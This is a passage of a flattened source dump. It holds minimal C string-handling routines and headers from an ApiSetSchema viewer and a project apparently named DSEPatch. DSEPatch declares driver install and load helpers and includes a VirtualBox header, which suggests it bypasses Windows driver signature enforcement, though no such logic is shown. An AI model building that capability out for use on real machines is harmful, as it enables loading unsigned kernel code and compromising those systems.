    if (s2 == 0)
        return 1;

    for (;;) {
        a = locase_w(*s1++);
        b = locase_w(*s2++);
        if ((a == 0) || (a != b))
            break;
    }

    return (int)(a - b);
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strcpy_a - copy the NUL-terminated string src into dest.
 *
 * Returns dest. Nothing is written when either pointer is null or when both
 * point at the same buffer.
 *
 * There is no destination-size parameter: the caller must guarantee that dest
 * can hold src plus its terminator, otherwise the copy runs past the end of
 * the buffer. _strncpy_a in this directory takes explicit sizes.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *out;

    if ((dest == 0) || (src == 0) || (dest == src))
        return dest;

    /* Only src's own terminator stops this copy. */
    for (out = dest; *src != 0; out++, src++)
        *out = *src;

    *out = 0;
    return dest;
}

/*
 * _strcpy_w - wide-character counterpart of _strcpy_a.
 *
 * Same contract and the same caveat: the capacity of dest is never checked.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out;

    if ((dest == 0) || (src == 0) || (dest == src))
        return dest;

    for (out = dest; *src != 0; out++, src++)
        *out = *src;

    *out = 0;
    return dest;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strend.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strend_a - return a pointer to the NUL terminator of s.
 *
 * Returns 0 for a null pointer. The const qualifier of the argument is cast
 * away on return, so the caller decides whether writing there is valid.
 */
char *_strend_a(const char *s)
{
    if (s == 0)
        return 0;

    for (; *s != 0; s++)
        ;

    return (char *)s;
}

/* _strend_w - wide-character counterpart of _strend_a. */
wchar_t *_strend_w(const wchar_t *s)
{
    if (s == 0)
        return 0;

    for (; *s != 0; s++)
        ;

    return (wchar_t *)s;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strlen.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strlen_a - count the chars that precede the NUL terminator of s.
 *
 * A null pointer is reported as length 0. The scan has no upper bound, so s
 * must really be NUL-terminated.
 */
size_t _strlen_a(const char *s)
{
    const char *cur = s;

    if (s == 0)
        return 0;

    while (*cur != 0)
        cur++;

    return (cur - s);
}

/*
 * _strlen_w - wide-character counterpart of _strlen_a.
 *
 * The result is a count of wchar_t elements, not bytes.
 */
size_t _strlen_w(const wchar_t *s)
{
    const wchar_t *cur = s;

    if (s == 0)
        return 0;

    while (*cur != 0)
        cur++;

    return (cur - s);
}
--------------------------------------------------------------------------------
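/source/ApiSetSchema/minirtl/_strncmpi.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strncmpi_a - case-insensitive comparison of at most cchars characters.
 *
 * Returns 0 when the pointers are identical or cchars is 0, -1 when only s1
 * is null and 1 when only s2 is null. Otherwise returns the difference of the
 * first pair of folded characters that differ within the first cchars
 * positions, or 0 when none differ.
 *
 * Folding is done by locase_a, which maps 'A'..'Z' only.
 */
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
    char a, b;

    if (s1 == s2)
        return 0;

    if (s1 == 0)
        return -1;

    if (s2 == 0)
        return 1;

    if (cchars == 0)
        return 0;

    /* cchars is known to be non-zero here, so a and b are always assigned. */
    for (; cchars > 0; cchars--) {
        a = locase_a(*s1++);
        b = locase_a(*s2++);
        if ((a == 0) || (a != b))
            break;
    }

    return (int)(a - b);
}

/* _strncmpi_w - wide-character counterpart of _strncmpi_a (folds via locase_w). */
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;

    if (s1 == 0)
        return -1;

    if (s2 == 0)
        return 1;

    if (cchars == 0)
        return 0;

    for (; cchars > 0; cchars--) {
        a = locase_w(*s1++);
        b = locase_w(*s2++);
        if ((a == 0) || (a != b))
            break;
    }

    return (int)(a - b);
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strncpy.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strncpy_a - bounded copy that always terminates the destination.
 *
 * dest   - destination buffer
 * ccdest - capacity of dest in chars, terminator included
 * src    - source string
 * ccsrc  - maximum number of chars to take from src
 *
 * Copies until src ends, ccsrc chars were taken, or dest has only the slot
 * for the terminator left, then writes the terminator. Returns dest; nothing
 * is written when a pointer is null or ccdest is 0.
 *
 * Both counters are tested before *src is read, so a source that is exactly
 * ccsrc chars long and carries no terminator is never read past its end.
 */
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
    char *out;
    size_t room;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    room = ccdest - 1; /* one slot is reserved for the terminator */
    out = dest;

    while ((room > 0) && (ccsrc > 0) && (*src != 0)) {
        *out++ = *src++;
        room--;
        ccsrc--;
    }

    *out = 0;
    return dest;
}

/*
 * _strncpy_w - wide-character counterpart of _strncpy_a.
 *
 * ccdest and ccsrc count wchar_t elements, not bytes.
 */
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
    wchar_t *out;
    size_t room;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    room = ccdest - 1; /* one slot is reserved for the terminator */
    out = dest;

    while ((room > 0) && (ccsrc > 0) && (*src != 0)) {
        *out++ = *src++;
        room--;
        ccsrc--;
    }

    *out = 0;
    return dest;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strstr.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strstr_a - find the first occurrence of sub_s inside s.
 *
 * Returns s when both pointers are identical, 0 when either is null, a
 * pointer into s at the first match, or 0 when there is none.
 *
 * Unlike the C library strstr, an empty sub_s yields 0 (unless it is the very
 * same pointer as s). Callers that treat 0 as "not present" should keep that
 * in mind.
 */
char *_strstr_a(const char *s, const char *sub_s)
{
    const char *hay, *pat;
    char first, h, n;

    if (s == sub_s)
        return (char *)s;

    if ((s == 0) || (sub_s == 0))
        return 0;

    first = *sub_s;
    if (first == 0)
        return 0;

    for (;;) {
        /* Skip ahead to the next candidate start. */
        while ((*s != 0) && (*s != first))
            s++;

        if (*s == 0)
            return 0;

        /* Compare from the candidate until a mismatch or the end of sub_s. */
        hay = s;
        pat = sub_s;
        do {
            h = *hay++;
            n = *pat++;
        } while ((h == n) && (n != 0));

        if (n == 0)
            return (char *)s;

        s++;
    }
}

/* _strstr_w - wide-character counterpart of _strstr_a, same empty-needle rule. */
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s)
{
    const wchar_t *hay, *pat;
    wchar_t first, h, n;

    if (s == sub_s)
        return (wchar_t *)s;

    if ((s == 0) || (sub_s == 0))
        return 0;

    first = *sub_s;
    if (first == 0)
        return 0;

    for (;;) {
        while ((*s != 0) && (*s != first))
            s++;

        if (*s == 0)
            return 0;

        hay = s;
        pat = sub_s;
        do {
            h = *hay++;
            n = *pat++;
        } while ((h == n) && (n != 0));

        if (n == 0)
            return (wchar_t *)s;

        s++;
    }
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
/* Fallback definitions for builds where the CRT headers did not provide them. */
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */

#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */

/* Fold 'A'..'Z' to lower case; every other value is returned unchanged. */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}

/* Wide variant of locase_a; only the ASCII range 'A'..'Z' is folded. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}

/*
 * Absolute value of a char.
 * NOTE(review): the result is narrowed back to char, so the most negative
 * char value has no positive counterpart and cannot be represented.
 */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}

/* Nonzero when x is one of '0'..'9'. */
__forceinline int _isdigit_a(char x) {
    return ((x >= '0') && (x <= '9'));
}

/* Nonzero when x is one of L'0'..L'9'. */
__forceinline int _isdigit_w(wchar_t x) {
    return ((x >= L'0') && (x <= L'9'));
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/ultostr.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * ultostr_a - format x as unsigned decimal text.
 *
 * Returns the number of digits (at least 1). With s == 0 only that count is
 * computed, which lets a caller size the buffer first. Otherwise the digits
 * and a terminator are written, so s must hold the returned count plus one
 * chars; the function has no way to check that.
 */
size_t ultostr_a(unsigned long x, char *s)
{
    unsigned long probe;
    size_t digits = 1, pos;

    for (probe = x; probe >= 10; probe /= 10)
        digits++;

    if (s == 0)
        return digits;

    /* Digits are produced least-significant first, so fill right to left. */
    for (pos = digits; pos != 0; pos--) {
        s[pos - 1] = (char)(x % 10) + '0';
        x /= 10;
    }

    s[digits] = (char)0;
    return digits;
}

/*
 * ultostr_w - wide-character counterpart of ultostr_a.
 *
 * s must hold the returned count plus one wchar_t elements.
 */
size_t ultostr_w(unsigned long x, wchar_t *s)
{
    unsigned long probe;
    size_t digits = 1, pos;

    for (probe = x; probe >= 10; probe /= 10)
        digits++;

    if (s == 0)
        return digits;

    for (pos = digits; pos != 0; pos--) {
        s[pos - 1] = (wchar_t)(x % 10) + L'0';
        x /= 10;
    }

    s[digits] = (wchar_t)0;
    return digits;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++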
generated include file. 3 | // Used by Resource.rc 4 | // 5 | #define IDD_ASDIALOG 101 6 | #define IDI_ICON_MAIN 103 7 | #define IDC_SEARCH_EDIT 1001 8 | #define IDC_SEARCH_BUTTON 1002 9 | #define IDC_ENTRY_EDIT 1003 10 | 11 | // Next default values for new objects 12 | // 13 | #ifdef APSTUDIO_INVOKED 14 | #ifndef APSTUDIO_READONLY_SYMBOLS 15 | #define _APS_NEXT_RESOURCE_VALUE 104 16 | #define _APS_NEXT_COMMAND_VALUE 40001 17 | #define _APS_NEXT_CONTROL_VALUE 1003 18 | #define _APS_NEXT_SYMED_VALUE 101 19 | #endif 20 | #endif 21 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.271 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DSEPatch", "DSEPatch\DSEPatch.vcxproj", "{75CEED88-EA4C-4F16-AC88-5F223AAB0591}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.ActiveCfg = Debug|x64 15 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.Build.0 = Debug|x64 16 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.ActiveCfg = Release|x64 17 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {903A1DAC-7E4E-4237-BA77-08CB08936EA9} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- 
/source/DSEPatch/DSEPatch/DSEPatch.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | WindowsLocalDebugger 7 | 8 | 9 | -r 10 | WindowsLocalDebugger 11 | 12 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/cui/cui.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018 4 | * 5 | * TITLE: CUI.H 6 | * 7 | * VERSION: 1.30 8 | * 9 | * DATE: 01 Aug 2018 10 | * 11 | * Common header file for console ui. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | VOID cuiInitialize( 22 | _In_ BOOL InitInput, 23 | _Out_opt_ PBOOL IsConsoleOutput 24 | ); 25 | 26 | #ifdef _UNICODE 27 | #define cuiPrintText cuiPrintTextW 28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW 29 | #else 30 | #define cuiPrintText cuiPrintTextA 31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA 32 | #endif 33 | 34 | 35 | VOID cuiPrintTextA( 36 | _In_ LPSTR lpText, 37 | _In_ BOOL UseReturn 38 | ); 39 | 40 | VOID cuiPrintTextW( 41 | _In_ LPWSTR lpText, 42 | _In_ BOOL UseReturn 43 | ); 44 | 45 | VOID cuiPrintTextLastErrorA( 46 | _In_ BOOL UseReturn 47 | ); 48 | 49 | VOID cuiPrintTextLastErrorW( 50 | _In_ BOOL UseReturn 51 | ); 52 | 53 | VOID cuiClrScr( 54 | VOID 55 | ); 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/global.h: -------------------------------------------------------------------------------- 1 | 
/******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: GLOBAL.H 6 | * 7 | * VERSION: 1.05 8 | * 9 | * DATE: 22 Jan 2019 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | #if !defined UNICODE 22 | #error ANSI build is not supported 23 | #endif 24 | 25 | #pragma warning(disable: 4005) // macro redefinition 26 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression 27 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 28 | 29 | 30 | #if defined (_MSC_VER) 31 | #if (_MSC_VER >= 1900) 32 | #ifdef _DEBUG 33 | #pragma comment(lib, "vcruntimed.lib") 34 | #pragma comment(lib, "ucrtd.lib") 35 | #else 36 | #pragma comment(lib, "libucrt.lib") 37 | #pragma comment(lib, "libvcruntime.lib") 38 | #endif 39 | #endif 40 | #endif 41 | 42 | #include 43 | #include 44 | #include "vbox.h" 45 | #include "ntdll/ntos.h" 46 | #include "minirtl/minirtl.h" 47 | #include "minirtl/cmdline.h" 48 | #include "hde/hde64.h" 49 | #include "cui/cui.h" 50 | #include "sup.h" 51 | #include "instdrv.h" 52 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/hde/pstdint.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved. 
4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #pragma once 28 | 29 | #include 30 | 31 | // Integer types for HDE. 
32 | typedef INT8 int8_t; 33 | typedef INT16 int16_t; 34 | typedef INT32 int32_t; 35 | typedef INT64 int64_t; 36 | typedef UINT8 uint8_t; 37 | typedef UINT16 uint16_t; 38 | typedef UINT32 uint32_t; 39 | typedef UINT64 uint64_t; 40 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/instdrv.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon 4 | * 5 | * TITLE: INSTDRV.H 6 | * 7 | * VERSION: 1.10 8 | * 9 | * DATE: 17 Apr 2017 10 | * 11 | * Common header file for the program SCM usage. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | BOOL scmInstallDriver( 22 | _In_ SC_HANDLE SchSCManager, 23 | _In_ LPCTSTR DriverName, 24 | _In_opt_ LPCTSTR ServiceExe 25 | ); 26 | 27 | BOOL scmStartDriver( 28 | _In_ SC_HANDLE SchSCManager, 29 | _In_ LPCTSTR DriverName 30 | ); 31 | 32 | BOOL scmOpenDevice( 33 | _In_ LPCTSTR DriverName, 34 | _Inout_opt_ PHANDLE lphDevice 35 | ); 36 | 37 | BOOL scmStopDriver( 38 | _In_ SC_HANDLE SchSCManager, 39 | _In_ LPCTSTR DriverName 40 | ); 41 | 42 | BOOL scmRemoveDriver( 43 | _In_ SC_HANDLE SchSCManager, 44 | _In_ LPCTSTR DriverName 45 | ); 46 | 47 | BOOL scmUnloadDeviceDriver( 48 | _In_ LPCTSTR Name 49 | ); 50 | 51 | BOOL scmLoadDeviceDriver( 52 | _In_ LPCTSTR Name, 53 | _In_opt_ LPCTSTR Path, 54 | _Inout_ PHANDLE lphDevice 55 | ); 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcat.c: 
-------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmp_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = *s1; 18 | c2 = *s2; 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = *s1; 41 | c2 = *s2; 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmpi_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 
| 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = locase_a(*s1); 18 | c2 = locase_a(*s2); 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = locase_w(*s1); 41 | c2 = locase_w(*s2); 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | 
-------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmp_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = *s1; 21 | c2 = *s2; 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = *s1; 48 | c2 = *s2; 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmpi_a(const char *s1, const char *s2, 
size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = locase_a(*s1); 21 | c2 = locase_a(*s2); 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = locase_w(*s1); 48 | c2 = locase_w(*s2); 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) || (ccdest==0) ) 8 | return dest; 9 | 10 | ccdest--; 11 | p = dest; 12 | 13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 14 | *p = *src; 15 | p++; 16 | src++; 17 | ccdest--; 18 | ccsrc--; 19 | } 20 | 21 | *p = 0; 22 | return dest; 23 | } 24 | 25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc) 26 | { 27 | wchar_t *p; 28 | 29 | if ( (dest==0) || (src==0) || (ccdest==0) ) 30 | return dest; 31 | 32 | ccdest--; 33 | p = dest; 34 | 35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | ccdest--; 40 | ccsrc--; 41 | } 42 | 43 | *p = 0; 44 | return dest; 45 | } 46 | -------------------------------------------------------------------------------- 
/source/DSEPatch/DSEPatch/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef 